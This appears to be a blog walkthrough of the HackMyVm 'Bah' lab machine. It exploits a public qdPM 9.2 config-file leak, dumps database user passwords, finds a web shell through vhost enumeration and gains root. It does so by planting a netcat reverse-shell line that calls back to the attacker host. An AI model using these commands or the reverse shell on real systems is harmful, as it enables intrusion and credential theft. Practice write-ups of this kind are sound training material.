日度归档:2021 年 8 月 22 日

HackMyVm Bah Walkthrough

发表评论

HackMyVm Bah Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Bah

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log  
 ...
 PORT     STATE SERVICE VERSION
 80/tcp   open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: qdPM | Login
 3306/tcp open  mysql   MySQL 5.5.5-10.5.11-MariaDB-1
 ...

Open port 80 in web browser, it shows qdPM v9.2 login panel. Google that it may leak credentials.

# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
 # Date: 03/08/2021
 # Exploit Author: Leon Trappett (thepcn3rd)
 # Vendor Homepage: https://qdpm.net/
 # Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
 # Version: 9.2
 # Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4

 The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.

Download databases.yml, get login name and password.

```bash
~ wget http://192.168.56.100/core/config/databases.yml
~ cat databases.yml
...
username: qpmadmin
password: "<?php echo urlencode('qpmpazzw') ; ?>"


Login 3306, get a url list.

 ```bash
~ mysql -h 192.168.56.100 -p3306 -u qpmadmin -p
 ...
 +----+-------------------------+
 | id | url                     |
 +----+-------------------------+
 |  1 | http://portal.bah.hmv   |
 |  2 | http://imagine.bah.hmv  |
 |  3 | http://ssh.bah.hmv      |
 |  4 | http://dev.bah.hmv      |
 |  5 | http://party.bah.hmv    |
 |  6 | http://ass.bah.hmv      |
 |  7 | http://here.bah.hmv     |
 |  8 | http://hackme.bah.hmv   |
 |  9 | http://telnet.bah.hmv   |
 | 10 | http://console.bah.hmv  |
 | 11 | http://tmux.bah.hmv     |
 | 12 | http://dark.bah.hmv     |
 | 13 | http://terminal.bah.hmv |
 +----+-------------------------+
 13 rows in set (0.001 sec)

And a users list.

 MariaDB [hidden]> select * from users;
 +----+---------+---------------------+
 | id | user    | password            |
 +----+---------+---------------------+
 |  1 | jwick   | Ihaveafuckingpencil |
 |  2 | rocio   | Ihaveaflower        |
 |  3 | luna    | Ihavealover         |
 |  4 | ellie   | Ihaveapassword      |
 |  5 | camila  | Ihaveacar           |
 |  6 | mia     | IhaveNOTHING        |
 |  7 | noa     | Ihaveflow           |
 |  8 | nova    | Ihavevodka          |
 |  9 | violeta | Ihaveroot           |
 +----+---------+---------------------+
 9 rows in set (0.001 sec)

Make a dic with the url and enum vhost. All urls are OK, but party.bah.hmv returns the minimum size.

 ~ gobuster vhost -u bah.hmv  -w  dic                                                                    
 ===============================================================
 2021/08/22 10:38:10 Starting gobuster in VHOST enumeration mode
 ===============================================================
 Found: party.bah.hmv (Status: 200) [Size: 5216]
 Found: imagine.bah.hmv (Status: 200) [Size: 5659]
 Found: portal.bah.hmv (Status: 200) [Size: 5657]
 Found: hackme.bah.hmv (Status: 200) [Size: 5657]
 Found: telnet.bah.hmv (Status: 200) [Size: 5657]
 Found: dev.bah.hmv (Status: 200) [Size: 5651]    
 Found: ssh.bah.hmv (Status: 200) [Size: 5651]    
 Found: here.bah.hmv (Status: 200) [Size: 5653]  
 Found: ass.bah.hmv (Status: 200) [Size: 5651]    
 Found: console.bah.hmv (Status: 200) [Size: 5659]
 Found: tmux.bah.hmv (Status: 200) [Size: 5653]  
 Found: dark.bah.hmv (Status: 200) [Size: 5653]  
 Found: terminal.bah.hmv (Status: 200) [Size: 5661]

Add party.bah.hmv into /etc/hosts, and visit port 80 again, we get a shell interface. Login with the credentials from yml file.

image-20210822104716708.png

This web shell is OK, so we don't need to spawn a reverse shell.

In /home, found another user rocio, escalate to user rocio with password we get from database.

 qpmadmin@bah:/home/rocio$ su rocio
 Password:
 rocio@bah:~$ id
 uid=1000(rocio) gid=1000(rocio) groups=1000(rocio),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Check pspy. Notice an interesting command of shellinaboxd.

 2021/08/21 23:38:00 CMD: UID=107  PID=452    | /usr/bin/shellinaboxd -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 4200 -u shellinabox -g shellinabox --user-css Black on White:+/etc/shellinabox/options-enabled/00+Bl
 ack on White.css,White On Black:-/etc/shellinabox/options-enabled/00_White On Black.css;Color Terminal:+/etc/shellinabox/options-enabled/01+Color Terminal.css,Monochrome:-/etc/shellinabox/options-enabled/01_Monochrome.css --no-beep --disa
 ble-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/dev

From the github help of shellinabox, we can know /devel:root:root:/:/tmp/dev means if we visit http://xxxx/devel, we will run /tmp/dev as root.

So we create shell code in /tmp/dev.

 ~ echo 'nc 192.168.56.150 1234 -e /bin/bash' >/tmp/dev
 ~ chmod +x /tmp/dev

When we visit http://party.bah.hmv/devel/ from web browser, we will get reverse shell.

 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:59154.
 id
 uid=0(root) gid=0(root) groups=0(root)